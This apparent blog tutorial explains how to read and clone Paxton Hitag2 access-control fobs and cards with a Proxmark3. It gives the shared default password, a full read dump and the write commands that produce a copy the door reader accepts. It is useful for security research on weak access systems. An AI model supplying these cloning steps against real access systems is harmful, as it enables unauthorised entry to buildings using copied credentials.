How to copy, read and write Paxton fobs and cards with a Proxmark

20 Apr, 2023

Paxton fobs and readers are popular in the UK especially the Net2 system where the fobs look like this with a blue ring:

Green rings on the fob usually denote a slightly different system called Switch2 which is not networked and is programmed with fobs or cards themselves. These fobs can also copied using this guide.

Paxton readers often look like this:

Paxton systems can also use cards sometimes with a magnetic stripe sometimes without.

This guide covers how to read the data from an existing Paxton fob or card and also how to write data to a fob or card. If the original fob or card has been authorised with the reader the new fob or card will be seen by the reader as the same tag, effectively a clone. You can copy cards to fobs and fobs to cards. Hereafter both fobs and cards will be referred to as tags.

These original Paxton tags use hitag2 technology and so can be copied to any hitag2 cards, fobs or other tag form factor.

Equipment used

• A PROXMARK 3 RDV4.01 I got mine from KSec https://labs.ksec.co.uk/product/proxmark-3-rdv4-kit/. This should work with the proxmark3 Easy but just less reliable
• A computer with a terminal connected via USB to the proxmark
• Some hitag2 tags See notes here.

Reading the tag

I'm going assume you have already connected to your proxmark3. If not there are some guides here.

Paxton fobs are password protected but the password is the same for all fobs and readers and is the hex string 0xBDF5E846.

So to read our for we just place the fob or card on the reader.

We can then do:

[usb] pm3 --> lf hitag read --21 -k BDF5E846
[+]  UID: 466d9713

[=] Hitag2 tag information 

[=] ------------------------------------
[+] Config byte : 0x06 [ 00000110 ]
[+] Encoding    : Manchester
[+] Version     : Hitag2
[+] Coding in HITAG 2 operation: manchester
[+] Tag is in   : Password mode
[+] Page 6,7    : RW
[+] Page 4,5    : RW
[+] Page 3      : RW
[+] Page 1,2    : RW
[=] ------------------------------------
[=] 00 | 46 6D 97 13 | Fm..
[=] 01 | BD F5 E8 46 | ...F
[=] 02 | 20 F0 4F 4E |  .ON
[=] 03 | 06 F9 07 C2 | ....
[=] 04 | 9D AD 91 08 | ....
[=] 05 | B0 BF 00 03 | ....
[=] 06 | 00 30 00 06 | .0..
[=] 07 | 75 EB 00 10 | u...
[=] 08 | 00 00 00 00 | ....
[=] 09 | 00 00 00 00 | ....
[=] 10 | 00 00 00 00 | ....
[=] 11 | 00 00 00 00 | ....
[=] -------- Possible de-scramble patterns ---------
[+] Paxton id: 36692262 | 0x22fe126

This is a dump of all the data held on a Paxton fob. The data is made up of 12 pages of 4 bytes. However, only pages 4 and 5 are used to hold the data that identifiees the tag to the reader. What are the other pages? The first 4 pages are config data and passwords. You can read more about the hitag2 tags here.

Copying to a new hitag2 card or fob

We only need to copy the relevant pages to our new tag. Take a note of the hex code for pages 4 and 5. Then swap the tag on the proxmark and write to the new tag.

lf hitag writer --27 -k BDF5E846 -p 4 -d 9DAD9108
lf hitag writer --27 -k BDF5E846 -p 5 -d B0BF0003

Checking the new tag

The write command can be a bit error prone ¹ so it is worth checking the tag you just wrote to to check that the correct vales were written with

[usb] pm3 --> lf hitag read --21 -k BDF5E846

Getting hold of hitag2 tags

This is actually one of the harder steps especially with hitag2 cards in smaller quantities. A lot of what are advertised as hitag2 cards when they arrive turn out to be a different card type such as EM4100. In the course of this research I ended up with a load of tags of many types.

Paxton fobs can be widely picked up in packs of 10 for about £30 but this is much more than a hitag2 card should cost which is less than half that.

If you want to give this guide a go I have a small quantity of genuine Paxton fobs I purchased and would be willing to sell individually for around cost price. If you would like one of these contact me via github. Also happy to clone tags for research.